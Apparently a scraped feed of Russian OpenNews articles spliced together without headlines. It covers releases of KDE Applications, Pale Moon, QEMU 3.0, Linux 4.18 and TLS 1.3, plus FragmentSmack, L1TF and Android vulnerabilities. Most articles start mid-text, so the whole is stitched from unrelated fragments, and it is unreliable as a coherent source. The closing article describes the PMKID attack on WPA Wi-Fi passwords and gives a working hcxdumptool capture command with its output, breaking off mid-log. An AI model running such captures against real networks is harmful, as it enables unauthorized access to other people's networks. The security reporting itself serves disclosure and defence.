Основные новшества:

• Расширены возможности файлового менеджера Dolphin: Модернизировано оформление конфигуратора. Устранены утечки памяти, негативно влиявшие на производительность. При просмотре корзины прекращено отображение меню 'Create New'. Интерфейс лучше адаптирован для оптимальной работы при высоких разрешениях экрана. В контекстное меню добавлены опции для выбора типа сортировки и изменения режима просмотра. Проведена оптимизация алгоритма сортировки по времени изменения файлов, который теперь работает приблизительно в 12 раз быстрее. Возобновлена поддержка запуска Dolphin в режиме суперпользователя.
• Улучшен эмулятор терминала Konsole: Виджет поиска теперь выводится в верхней части окна и не мешает работе в терминале. Расширен диапазон поддерживаемых escape-последовательностей (например, добавлены DECSCUSR и альтернативный режим прокрутки XTerm). В горячих клавишах теперь можно использовать любые символы;
• Значительно расширены возможности просмотрщика изображений Gwenview. В панель добавлен счётчик изображений. Добавлена возможность сортировки изображений по рейтингу и в порядке убывания. При сортировке по дате теперь отдельно выводятся каталоги и архивы. Добавлена поддержка перемещения файлов и каталогов мышью при помощи интерфейса drag-and-drop для их отображения в режиме просмотра, а также для переноса во внешние приложения. Также появилась поддержка перемещения изображений во внешние приложения через буфер обмена. Переработан диалог изменения размера изображений, в том числе появилась возможность указания масштаба в процентах. Решены проблемы с работой ползунка выбора размера и метки в фильтре устранения эффекта красных глаз. Для полупрозрачных фоновых изображений и файлов SVG добавлена возможность выбора пустого фона;

  Переработан интерфейс масштабирования изображений. При активных инструментах кадрирования и устранения эффекта красных глаз добавлена возможность изменения масштаба через прокрутку мышью с кликом и через панорамирование. Среднюю кнопку мыши можно использовать для переключением между 100% масштабом и вмещением всего изображения в текущее окно. Обеспечено использование текущей позиции курсора в качестве базовой позиции для изменения масштаба с использованием мыши или горячих клавиш.

  

  Расширены возможности режима сравнения изображений. Улучшено применение плавных переходов между изображениями различного размера и уровня прозрачности. При сохранении изображения под новым именем прекращен проброс на показ следующего изображения. Добавлено приглашения для установки kipi-plugins при нажатии нажатии на кнопку Share. Исключено случайное закрытие боковой панели при изменении размера и обеспечено запоминание выбранной ширины;

  
• В почтовом клиенте KMail расширены возможности извлечения из писем данных о поездках - добавлена поддержка штрихкодов железнодорожных билетов в форматах UIC 918.3 и SNCF, а также определения местоположения станций Добавлена поддержка интеграции KMail с приложением KDE Itinerary;
• Ускорена работа фреймворка управления персональной информацией. Для SMTP добавлена поддержка XOAUTH, что позволяет напрямую выполнять аутентификацию в Gmail;
• Калькулятор KAlgebra адаптирован для управления с устройств с сенсорным экраном;
• Переработана реализация режима выбора прямоугольных областей в утилите для создания снимков экрана. Добавлено помещение в буфер обмена ссылок на скриншоты, отправленные в сервисы обмена изображениями. Добавлена поддержка автоматического сохранения скриншотов в специально заданный каталог;
• Повышена надёжность работы программы для работы с web-камерой Kamoso, которая также переведена на новую версию GStreamer.

1. OpenNews: Релиз рабочего стола KDE Plasma 5.13
2. OpenNews: Выпуск KDE Applications 18.04
3. OpenNews: Разработчик KWin ушёл с поста мэнтейнера из-за несогласия с новыми веяниями в KDE
4. OpenNews: Релиз браузера Falkon 3.0.0, развиваемого проектом KDE
5. OpenNews: Первый выпуск музыкального проигрывателя Elisa, развиваемого сообществом KDE

Проект придерживается классической организации интерфейса, без перехода к интегрированному в Firefox 29 интерфейсу Australis и с предоставлением широких возможностей кастомизации. Из удалённых компонентов можно отметить DRM, Social API, WebRTC, PDF-просмотрщик, Сrash Reporter, код для сбора статистики, средства для родительского контроля и людей с ограниченными возможностями. По сравнению с Firefox в браузере оставлена поддержка технологии XUL, дополнений Jetpack Jetpack и NPAPI-плагинов. Сохранена возможности применения как полноценных тем оформлений, так и легковесных тем.

Новая ветка примечательна переходом на использование платформы UXP (Unified XUL Platform), в рамках которой выполнено ответвление остальных компонентов Firefox из репозитория Mozilla Central, избавленных от привязок к коду на языке Rust и не включающих наработки проекта Quantum. В UXP полностью сохранена поддержка классических дополнений, написанных на языке XUL.

JavaScript-движок SpiderMonkey обновлён до актуальной кодовой базы, в которой реализованы все возможности стандартов ECMAScript, предлагаемые другими современными браузерами. Движок отрисовки Goanna, форк Gecko, обновлён до четвёртой версии, в которой значительно улучшена совместимость с современными технологиями CSS, в том числе добавлена поддержка CSS Grid. Обеспечена поддержка новых элементов DOM (Document Object Model) и новых API, таких как Fetch, WebAnimations, WebCrypto и HTML Input Element Extensions. Улучшена поддержка мультимедийных возможностей, таких как потоковое вещание MSE (для MP4) и возможность воспроизведения формата FLAC.

Добавлена поддержка стандарта WebGL2. Обновлены инструменты для web-разработчиков. Обновлён менеджер паролей, обеспечивающий сохранение параметров входа на сайты. Например, добавлена возможность сохранения паролей без привязки к логину и изменена форма выбора сохранённой учётной записи для полей входа.

1. OpenNews: Позиция проекта Pale Moon в отношении XUL-дополнений
2. OpenNews: Выпуск браузера Pale Moon 27.9.0
3. OpenNews: Выпуск браузера Pale Moon 27.0
4. OpenNews: Проект Pale Moon представил новый браузер Basilisk и платформу UXP

Разработчики дополнения попытались оправдать отправку данных выполнением проверки URL по чёрным спискам на стороне сервера для блокирования сайтов с вредоносным контентом, но обычно для подобных целей отправляются хэши от URL, а не ссылки в открытом виде. Более того, отправка данных производилась в привязке к идентификатору пользователя и также передавался прошлый URL, с которого был произведён переход на текущую страницу. Перед передачей данные скрывались при помощи шифрования. Примечательно, что в прикреплённом к дополнению соглашении разработчики заверили пользователей, что дополнение ни в каком виде автоматически не собирает сведения о пользователях, а на деле всё оказалось наоборот.

1. OpenNews: В браузерном дополнении Stylish выявлен код для отправки истории посещений
2. OpenNews: В результате фишинга получен контроль ещё над 6 дополнениями к Chrome
3. OpenNews: Зафиксирована подмена Chrome-дополнения Hola VPN, имеющего 8.7 млн пользователей
4. OpenNews: В 5 браузерных дополнениях и 6 мобильных приложениях обнаружен шпионящий код
5. OpenNews: Дополнение Web of Trust уличено в продаже сведений о посещениях пользователей

Атака осуществляется через отправку потока фрагментированных IP-пакетов, в каждом из которых смещение фрагмента установлено случайным образом. В отличие от прошлой уязвимости SegmentSmack, в FragmentSmack возможно совершение атаки с использованием спуфинга (отправки пакетов с указанием несуществующего IP). При этом для новой атаки требуется большая интенсивность отправки: для полной утилизации ресурсов одного ядра CPU Intel Xeon D-1587@1.70GHz необходим поток на уровне 30 тысяч пакетов в секунду, в то время как для SegmentSmack было достаточно 2 тысячи пакетов в секунду.

Наличие проблемы подтверждено в TCP стеках Linux и FreeBSD. В ядре Linux проблема проявляется начиная с выпуска ядра 3.9. Обновления с устранением проблемы подготовлены для Debian, Fedora, SUSE/openSUSE, Ubuntu, RHEL и FreeBSD. В качестве обходного пути защиты в Linux можно снизить значения sysctl net.ipv4.ipfrag_high_thresh и net.ipv4.ipfrag_low_thresh до 256kB и 192kB или ещё меньших значений.

    sysctl -w net.ipv4.ipfrag_high_thresh=262144
    sysctl -w net.ipv4.ipfrag_low_thresh=196608
    sysctl -w net.ipv6.ip6frag_high_thresh=262144
    sysctl -w net.ipv6.ip6frag_low_thresh=196608

Во FreeBSD в качестве обходного пути защиты рекомендовано отключить пересборку фрагментированных пакетов:

    sysctl net.inet.ip.maxfragpackets=0
    sysctl net.inet6.ip6.maxfrags=0

1. OpenNews: В TCP-стеке Linux и FreeBSD выявлена уязвимость, приводящая к отказу в обслуживании
2. OpenNews: L1TF - три новые уязвимости в механизме спекулятивного выполнения CPU Intel
3. OpenNews: Критические уязвимости в подсистеме eBPF ядра Linux
4. OpenNews: Выпуск модуля LKRG 0.2 для защиты от эксплуатации уязвимостей в ядре Linux
5. OpenNews: Уязвимость в генераторе случайных чисел ядра Linux

В качестве эмулятора QEMU позволяет запустить программу, собранную для одной аппаратной платформы, на системе с совершенно иной архитектурой, например, выполнить приложение для ARM на x86-совместимом ПК. В режиме виртуализации в QEMU производительность выполнения кода в изолированном окружении близка к нативной системе за счёт прямого выполнения инструкций на CPU и задействования гипервизора Xen или модуля KVM.

Изначально проект был создан Фабрисом Белларом (Fabrice Bellard) с целью обеспечения возможности запуска собранных для платформы x86 исполняемых файлов Linux на архитектурах, отличных от x86. За годы разработки была добавлена поддержка полной эмуляции для 14 аппаратных архитектур, число эмулируемых аппаратных устройств превысило 400. При подготовке версии 3.0 внесено более 2300 изменений от 169 разработчиков.

Ключевые улучшения, добавленные в QEMU 3.0:

• В код эмуляции блочных устройств добавлена поддержка активного зеркалирования дисков ("copy-mode active"), позволяющая избавиться от проблем с обеспечением целостности, возникающих при ранее предлагаемом фоновом копировании данных;
• Во фронтэнде на базе библиотеки SDL обеспечена поддержка OpenGL ES. Также добавлена дополнительная опция для устройств фреймбуфера, позволяющая обеспечить вывод на экран на ранней стадии загрузки без эмуляции VGA;
• Интегрирована дополнительная защита от уязвимости Spectre 4 (CVE-2018-3639);
• Улучшена поддержка вложенного запуска гостевых систем KVM в окружениях на базе гипервизора Hyper-V;
• Улучшена поддержка эмуляции контроллеров AHCI и SCSI;
• Для устройств TPM TIS добавлена поддержка режима live-миграции;
• Обеспечена возможность ограничения пропускной способности при копировании состояния виртуальных машин в процессе отложенной миграции (опция "max-postcopy-bandwidth"), добавлен режим восстановления в случае сбоя отложенной миграции (команда "migrate_recover") и возможность приостановки миграции (команда "migrate_pause");
• Увеличена отзывчивость при использование сетевого стека в пространстве пользователя (SLIRP);
• В эмулятор архитектуры x86 добавлена новая модель CPU KnightsMill и обеспечена поддержка расширений AMD TOPOEXT (предоставляет информацию о кэше для CPU семейства EPYC). В код эмуляции SVM добавлена поддержка перехвата NMI и NPT;
• В эмулятор архитектуры ARM добавлена поддержка SMMUv3 IOMMU для виртуальных машин типа 'virt', реализованы расширения v8M (инструкции VLLDM и VLSTM для вычислений с плавающей запятой), улучшена поддержка расширений AArch64 v8.2 FP16 и добавлена поддержка расширений SVE (Scalable Vector Extensions);
• В эмулятор архитектуры Microblaze добавлена поддержка 64-разрядных адресов;
• В эмулятор архитектуры PowerPC для систем с типом "mac99" добавлена поддержка PMU, а для систем с типом "mac" улучшена эмуляция хостового моста PCI. Для систем "powernv" добавлена начальная поддержка эмуляции режима POWER9 hash MMU;
• В эмуляторе архитектуры RISC-V улучшена поддержка привилегированных ISA;
• В эмулятор архитектуры s390 добавлена поддержка модели CPU z14 ZR1 и включена по умолчанию защита от уязвимостей Spectre для z196 и более новых моделей CPU. Добавлена поддержка настройки консолей при помощи опции '-serial';
• Разработчики напоминают, что в будущем возможно будет прекращена поддержка платформ GNU/kFreeBSD, DragonFly BSD, Solaris и Haiku, из-за отсутствия сопровождающих или инфраструктуры для тестирования.

1. OpenNews: Релиз эмулятора QEMU 2.12.0
2. OpenNews: Релиз nEMU 1.4.0, консольного интерфейса для управления QEMU
3. OpenNews: Релиз эмулятора QEMU 2.11.0
4. OpenNews: Основатель QEMU и FFmpeg развивает систему синхронизации файлов VFsync
5. OpenNews: Проект QEMU Advent Calendar 2016 для быстрого знакомства с необычными ОС

Уязвимости манипулируют тем, что при доступе к памяти по виртуальному адресу, приводящему к исключению (terminal page fault) из-за отсутствия флага Present в таблице страниц памяти, процессоры Intel спекулятивно рассчитывают физический адрес и загружают данные, если они имеются в L1-кэше. Спекулятивное обращение выполняется до завершения перебора таблицы страниц памяти и независимо от состояния записи в таблице страниц памяти (PTE), т.е. до проверки наличия данных в физической памяти и их доступности для чтения. После завершения проверки доступности памяти, в случае отсутствия флага Present в PTE операция отбрасывается, но данные оседают в кэше и их можно извлечь при помощи методов определения содержимого кэша по сторонним каналам (через анализ изменения времени доступа к прокэшированным и не прокэшированным данным).

L1TF присвоен высокий уровень опасности, так как уязвимость позволяет определить данные по любому физическому адресу в системе, независимо от применяемых механизмов изоляции и виртуализации (например, можно атаковать систему из гостевой системы). Ограничением атаки является то, что для восстановления содержимого L1-кэша код для эксплуатации уязвимости должен выполняться на том же физическом ядре CPU, что и код, вызывающий page fault.

Всего предложено три варианта уязвимости:

• CVE-2018-3615 - извлечение данных из памяти анклавов Intel Software Guard Extensions (Intel SGX);
• CVE-2018-3620 - извлечение данных из SMM (System Management Mode) и областей памяти ядра ОС;
• CVE-2018-3646 - утечка данных из виртуальных машин в системах виртуализации.

Проблемам подвержены только процессоры Intel. Отмечается, что уязвимости уже устранены в прошлом обновлении микрокода. Для исправления первой проблемы достаточно обновления микрокода. Исправление второй и третьей проблемы выпущено в виде патча для ядра Linux и исправления для гипервизора Xen. Обновления уже формируются для дистрибутивов Ubuntu, Oracle, RHEL, SUSE, Debian и FreeBSD. Суть добавленной в ядро защиты сводится к использованию в записи PTE с пустым флагом Present ссылки на некэшируемую память (инверсия PTE). Для защиты систем виртуализации задействован сброс L1-кэша при переключении контекста виртуальных машин.

По данным Intel негативное влияние исправления на производительность составляет от 0% (клиентские применения) до 7% (при симуляции нагрузки на web-сервер в виртуальной машине). По тестам Red Hat инверсия PTE не создаёт негативного влияния на производительность, а сброс L1-кэша в большинстве применений замедляет работу не более чем на 2-5%, но в отдельных нагрузках замедление достигает 14% (без обновления микрокода - 27%). Как вариант блокирования уязвимости отмечается и отключение Hyper-Threading, но в этом случае падение производительности может достигать 30-50%.

1. OpenNews: Атака NetSpectre, приводящая к утечке содержимого памяти по сети
2. OpenNews: Представлена SpectreRSB, новая уязвимость в механизме спекулятивного выполнения CPU
3. OpenNews: Два новых варианта уязвимости Spectre. Усиление защиты Chrome
4. OpenNews: LazyFP - новая уязвимость в процессорах Intel
5. OpenNews: Представлена Spectre-NG, группа из 8 новых уязвимостей в процессорах

Уязвимости достаточно разноплановые, от инициирования краха прошивки, очистки всех данных пользователя и скрытого создания скриншотов или записи видео содержимого экрана, до получения root-привилегий, установки приложений без ведома пользователя, неавторизированной отправки SMS и доступа к адресной книге.

Все выявленные уязвимости выходят за пределы штатной модели управления доступом Android и, как правило, затрагивают дополнительные надстройки и драйверы, добавленные производителями. Уязвимости выявлены в рамках программы по анализу дополняющих базовую платформу драйверов и установленных по умолчанию программ. Исследование профинансировано Министерством внутренней безопасности США.

Дополнительно можно отметить публикацию компанией Check Point описания нового вектора атак на приложения для платформы Android - "Man-in-the-Disk". В настоящее время большое число приложений при установке запрашивают полномочия на доступ к внешнему хранилищу, которое используется для хранения временных и рабочих файлов на SD-карте или дополнительном Flash с целью экономии внутренней памяти смартфона.

Суть атаки в том, что на внешних накопителях отсутствует должное разделение привилегий и любое приложение имеет доступ ко всем данным на накопителе. Например, вредоносное приложение может подменить или изменить данные любых других установленных приложений и инициировать в лучшем случае их крах или некорректное выполнение, а в худшем подменить исполняемые компоненты приложений на вредоносный код.

Отмечается, что данной проблеме подвержены многие популярные программы. Например, продемонстрирована возможность инициирования отказа в обслуживании для Google Translate, Yandex Translate, Google Voice Typing и Google Text-to-Speech, а также организация обновления Xiaomi Browser до модифицированного вредоносного варианта. Атака по подмене приложения сводится к тому, что если программа сохраняет загруженное обновление во временный файл во внешнем хранилище, атакующий может отследить момент загрузки обновления и подменить его перед началом установки. Отказы в обслуживании инициируются через модификацию данных приложения на внешнем хранилище.

Для блокирования нового класса атак рекомендуется рассматривать все данные с внешних хранилищ как не заслуживающие доверия, обеспечивая полную проверку их корректности и не перенося на внешние хранилища исполняемые файлы или Java-классы. Для всех важных и исполняемых данных, сохраняемых во внешних хранилищах, обязательно должна обеспечиваться проверка целостности по цифровой подписи.

Установка защищённых соединений с использованием TLS 1.3 уже поддерживается в Firefox и Chrome, и реализована в ветке OpenSSL 1.1.1, которая пока находится на стадии тестирования. О включении поддержки TLS 1.3 на своих серверах заявили компании Cloudflare, Google и Facebook. Facebook отмечает, что уже около 50% всего трафика к социальной сети обрабатывается с использованием TLS 1.3.

Особенности TLS 1.3:

• Работа только в режиме совершенной прямой секретности (PFS, Perfect Forward Secrecy), при котором компрометация одного из долговременных ключей не позволяет расшифровать ранее перехваченный сеанс. Оставление поддержки только PFS вызвало много споров и стало камнем преткновения в достижении консенсуса, так как ряд производителей указывали на возможное негативное влияние PFS на корпоративные системы, в локальных сетях которых применяется инспектирование проходящего трафика, например, для обеспечения отказоустойчивости, мониторинга, диагностики проблем, фильтрации вредоносного ПО и выявления атак;
• Сокращение числа шагов при согласованиии соединения и поддержка режима 0-RTT для устранения задержек при возобновлении ранее установленных HTTPS-соединений. При установке HTTPS-соединения выполняются 4 фазы: запрос DNS, TCP Handshake (1 RTT), TLS Handshake (2 RTT на согласование ключей и параметров шифрованного канала) и отправка запроса HTTP (1 RTT). По сравнению с TLS 1.2 в новом стандарте число RTT для TLS Handshake сокращено с 2 до 1, т.е. для установки и возобновления соединения требуется запрос DNS и 3 цикла обмена данными (RTT) вместо 4. 0-RTT позволяет сохранить ранее согласованные параметры TLS и снизить до 2 число RTT при возобновлении ранее установленного соединения. По данным Facebook, по сравнению с TLS 1.2 использование TLS 1.3 приводит к сокращению задержек на 46% при установке соединений и на 10% при отправке первого запроса;
• Поддержка потокового шифра ChaCha20 и алгоритма аутентификации сообщений (MAC) Poly1305, разработанных Дэниелом Бернштейном (Daniel J. Bernstein), Таней Ланге (Tanja Lange) и Питером Швабе (Peter Schwabe). ChaCha20 и Poly1305 можно рассматривать, как более быстрые и безопасные аналоги AES-256-CTR и HMAC, программная реализация которых позволяет добиться фиксированного времени выполнения без задействования специальных аппаратных ускорителей;
• Поддержка защищённых ключей аутентификации на основе цифровых подписей Ed25519, которые обладают более высоким уровнем безопасности, чем ECDSA и DSA, и при этом отличаются очень высокой скоростью верификации и создания подписей. Стойкость к взлому для Ed25519 составляет порядка 2^128 (в среднем для атаки на Ed25519 потребуется совершить 2^140 битовых операций), что соответствует стойкости таких алгоритмов, как NIST P-256 и RSA с размером ключа в 3000 бит или 128-битному блочному шифру. Ed25519 также не подвержен проблемам с коллизиями в хэшах, не чувствителен к атакам через определение скорости работы кэша (cache-timing attacks) и атакам по сторонним каналам (side-channel attacks);
• Поддержка обмена ключами на основе алгоритмов x25519 (RFC 7748) и x448 (RFC 8031);
• Поддержка HKDF (HMAC-based Extract-and-Expand Key Derivation Function);
• Удаление устаревших и ненадёжных криптографических примитивов (MD5, SHA-224) и возможностей (сжатие, повторное согласование, не-AEAD шифры, статический обмен ключами RSA и DH, указание unix-времени в Hello-сообщениях и т.п.).

1. OpenNews: Организация EFF представила инициативу STARTTLS Everywhere
2. OpenNews: В следующем выпуске Android появится поддержка "DNS over TLS"
3. OpenNews: Дебаты вокруг TLS 1.3 и совершенной прямой секретности
4. OpenNews: Новый метод атаки на TLS, затрагивающий 27 из 100 крупнейших сайтов
5. OpenNews: Mozilla, Cloudflare, Fastly и Apple работают над применением шифрования для SNI

В новую версию принято 13 тысяч исправлений от 1668 разработчиков, размер патча - 50 Мб (изменения затронули 12866 файлов, добавлено 521039 строк кода, удалено - 619603 строк). Около 49% всех представленных в 4.18 изменений связаны с драйверами устройств, примерно 14% изменений имеют отношение к обновлению кода специфичного для аппаратных архитектур, 13% связано с сетевым стеком, 5% - файловыми системами и 3% c внутренними подсистемами ядра. 9.5% всех исправлений подготовлено разработчиками компании Intel, 7.5% - Red Hat, 4.6% - AMD, 4.3% - IBM, 3.8% - Linaro, 3.4% - Renesas Electronics, 3.0% - Google, 2.9% - SUSE, 2.8% - Samsung, 2.2% - Mellanox, 2.1% - Huawei, 2.0% - Oracle.

Основные новшества:

• Сетевая подсистема
  • В состав ядра включен новый механизм фильтрации пакетов bpfilter, использующего предоставляемую ядром подсистему eBPF, но предлагая привычный синтаксис iptables. Bpfilter обрабатывает запросы API iptables и транслирует их в программы BPF, привязываемые к различным подсистемам. В настоящий момент в ядро добавлена только базовая инфраструктура для bpfilter, но ещё не хватает некоторых компонентов, необходимых для полноценного применения bpfilter для фильтрации пакетов;
  • В качестве сопутствующей bpfilter разработки в ядро добавлен новый тип модулей ядра umh (usermode helper), которые выполняются в пространстве пользователя и привязываются в базовым модулям, предоставляя для них вспомогательную функциональность, которую нецелесообразно или опасно выполнять c привилегиями ядра (например в модуле bpfilter.ko через них выполняется разбор и трансляция в BPF правил фильтрации). Модули umh функционируют под управлением ядра, оформляются в виде модулей ядра и загружаются через modprobe, но выполняются в пространстве пользователя с привилегиями пользовательских приложений. Взаимодействие umh-модулей с обычными модулями ядра производится с использованием неименованных каналов (unix pipe);
  • В состав ядра включена подсистема AF_XDP (eXpress Data Path), которая предоставляет средства для запуска BPF-программ на уровне сетевого драйвера, с возможностью прямого доступа к DMA-буферу пакетов, что позволяет создавать высокопроизводительные обработчики для работы в условиях большой сетевой нагрузки. В качестве примера реализованы обработчики для быстрой блокировки и перенаправления пакетов.
  • Реализована возможность чтения данных из сетевого сокета в режиме zero-copy (флаг TCP_ZEROCOPY_RECEIVEY), позволяющем организовать передачу данных по сети без промежуточного копирования данных между ядром и пространством пользователя (поддержка записи в режиме zero-copy была представлена в ядре 4.14);
  • В реализации протокола TLS на уровне ядра (KTLS) добавлена возможность задействования аппаратного ускорения операций с использовнием специализированных чипов. В настоящее время вынос связанных с работой TLS вычислений на плечи оборудования доступен только при использовании драйвера Mellanox mlx5;
  • В TCP-стек добавлена поддержка режима сжатия для выборочного подтверждения соединений (SACK), что позволяет сократить число отправляемых SACK-пакетов при перегрузке сети;
  • Добавлена возможность прикрепления BPF-программ к сокету и запуска обработчиков при вызове sendmsg(). Подобные обработчики могут применяться для выполнения таких задач, как перезапись IP-адресов в исходящих пакетах;
• Виртуализация и безопасность
  • В подсистему шифрования (crypto) добавлена поддержка шифров AEGIS и MORUS, а также алгоритма сжатия Zstandard;
  • Пользователь с правами root в пространстве имён идентификаторов пользователя (user namespaces) теперь может монтировать файловые системы, даже если у него нет на это прав вне пространства имён. При этом файловая система должна быть специально помечена для разрешения подобных операций (в настоящий момент операции разрешены только для ФС, реализуемых в пространстве пользователя при помощи модулей FUSE);
  • В модуль fscrypt, применяемый для шифрования ФС F2FS и ext4, добавлена поддержка шифров Speck128 и Speck256, разработанных Агентством национальной безопасности США. Шифры обеспечивают очень высокую производительность программной реализации, которая обгоняет AES на системах без наличия средств аппаратного ускорения AES. Использование Speck позволяет применять шифрование на маломощных устройствах, на которых применение AES не оправдано из-за больших накладных расходов;
  • Для 32-разрядной архитектуры ARM обеспечена защита от уязвимостей Spectre 1 и Spectre 2 (ранее защита от Spectre была обеспечена для архитектур x86, ARM64 и S390). Для ARM64 добавлена защита от Spectre v4.
  • Проведена работа по переводу ядра на более защищёные от переполнения буфера варианты функций распределения памяти. Например, вызовы "kmalloc(count*size, gfp_flags)" заменены на "kmalloc_array(count, size, gfp_flags)";
  • Изменены настройки для включения защиты от переполнения стека - теперь автоматически включается наиболее действенный механизм защиты, доступный для текущей конфигурации;
• Дисковая подсистема, ввод/вывод и файловые системы
  • Для Device Mapper реализован новый модуль "writecache", который может применяться для кэширования операций записи блоков на SSD-накопителях или в постоянной памяти (кэширование операций чтения не реализовано, так как такие операции и так кэшируются кэше страниц памяти в ОЗУ);
  • Обеспечена возможность применения флага IOCB_FLAG_IOPRIO для операций асинхронного ввода/вывода, позволяющего установить приоритет выполнения отдельных операций;
  • Добавлен новый API поллинга (определение готовности файлового дескриптора к вводу/выводу без блокировки), основанный на использовании системы асинхронного ввода/вывода (AIO);
  • В файловой системе Btrfs обеспечена возможность удаления пустого подраздела при помощи вызова rmdir() без специальных дополнительных привилегий. Добавлены новые ioctl-команды FS_IOC_FSGETXATTR и FS_IOC_FSSETXATTR для манипуляции с различными атрибутами файла (append, immutable, noatime, nodump и sync), которые в отличие от команд GET/SETFLAGS могут выставить атрибуты на уровне отдельных inode. Также реализован набор ioctl-команд для получения непривилегированным пользователем информации о подразделах;
  • В файловой системе XFS появилась возможность смены метки для уже примонтированной ФС, добавлена поддержка резервирования пустых областей через вызов fallocate() для файлов подкачки, задействован FUA для обеспечения прямой записи данных в режиме O_DSYNC. Кроме того, началась интеграция нового инструментария для восстановления целостности ФС на лету и выполнена переработка кода growfs с целью подготовки интеграции поддержки подразделов (subvolume);
  • В файловой системе ext4 продолжена работа по чистке кода и повышению надёжности работы в условиях обработки некорректных образов ФС, специально модифицированных для вредоносных целей;
  • Из раздела "staging" удалён код кластерной файловой системы Lustre. В качестве причин упоминается отсутствие должной активности по приведению имеющегося кода к соответствию с остальным ядром, плохая адаптация кода к изменениям в VFS, а также игнорирование проблем и периодическая публикация патчей, ломающих имеющуюся функциональность;
  • В файловой системе F2FS улучшена поддержка режима "discard";
• Память и системные сервисы
  • В систему доменов управления питанием (genpd, generic power domain) добавлена поддержка уровней производительности, при помощи которых можно настраивать работу всей системы, включая периферийные устройства, для достижения требуемого баланса между потреблением энергии и производительностью;
  • В контроллер ресурсов памяти group, позволяющий управлять расходованием памяти группой задач, добавлен параметр memory.min, который в отличие от ранее доступного параметра memory.low предоставляет более надёжную гарантию предоставления минимального размера доступной для группы оперативной памяти (не отключается при срабатывании OOM killer в условиях нехватки памяти);
  • Добавлен системный вызов с реализацией перезапускаемых последовательностей (restartable sequences), позволяющих приложениям организовать неразрывное выполнение группы инструкций, не прерываемой и подтверждающей результат последней инструкцией в группе. По сути предоставляется средство для очень быстрого атомарного выполнения операций, которые в случае прерывания другим потоком очищаются и предпринимается повторная попытка выполнения. Возможность реализована для архитектур x86, ARM и PowerPC;
  • Реализован новый параметр запуска ядра no5lvl, предназначенный для отключения пятиуровневых таблиц страниц памяти, даже если оборудование обеспечивает их поддержку;
  • Из интерфейса /proc удалена статистика IPMI (по-прежнему оставлена в sysfs);
  • Добавлена новая система определения макросов для конфигурации ядра, которую можно использовать для выноса различных тестов, выполняемых на этапе сборки, из makefile в файлы Kconfig;
  • В JIT-компиляторе подсистемы eBPF реализована поддержка 32-разрядных систем x86;
• Оборудование
  • В драйвер Nouveau добавлена поддержка GPU NVIDIA Volta;
  • В DRM-драйвер AMDGPU добавлена поддержка GPU AMD Vega 20, а также GPU Kabylake-G (VEGAM - intel и radeon на одном чипе). Добавлены профили управления питанием, напряжением и частотой для GPU Vega10. Реализован режим энергосбережения gfxoff для GPU Raven;
  • В DRM-драйвере Intel включена поддержка чипов Icelake (ICL), проведён рефакторинг кода GuC/HuC и DPLL, включена поддержка NV12 и PSR/PSR2;
  • В драйвере amdkfd для dGPU (дискретные GPU, такие как Fiji, Tonga, Polaris) добавлена поддержка GPU GFX9;
  • Добавлен новый DRM-драйвер v3d для оборудования Broadcom V3D V3.x+;
  • Добавлен драйвер xen-front с реализаций графического фронтэнда для гостевых систем XEN в режиме паравиртуализации (PV);
  • Добавлена поддержка SoC Qualcomm Snapdragon 845, применяемого в новейших мобильных устройствах класса high-end;
  • Добавлена поддержка игровых контроллеров Steam от компании Valve;

Одновременно Латиноамериканский Фонд свободного ПО сформировал вариант полностью свободного ядра 4.18 - Linux-libre 4.18-gnu, очищенного от элементов прошивок и драйверов, содержащих несвободные компоненты или участки кода, область применения которых ограничена производителем. В новом выпуске представлен новый интерфейс для загрузки прошивок (firmware_reject_nowarn), не выводящий предупреждения в случае если прошивка не найдена. Добавлена чистка блобов для драйверов psp-dev и icn8505. Обновлён код чистки блобов в драйверах c3xxx, c62x, dvb-usb, dvb-usb-v2, iwlwifi, ks7010, ath10k, andgpu, i915, tg3, silead и ca0132. Прекращена чистка блобов для atom isp. Проверены ассемблерные файлы, вынесенные из основного кода amdkfd.

1. OpenNews: Релиз ядра Linux 4.17
2. OpenNews: Релиз ядра Linux 4.16
3. OpenNews: Релиз ядра Linux 4.15
4. OpenNews: Релиз ядра Linux 4.14
5. OpenNews: Релиз ядра Linux 4.13

Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.

Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.

Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

Для проведения атаки требуются свежие версии hcxdumptool, hcxtools и hashcat.

Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng

   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
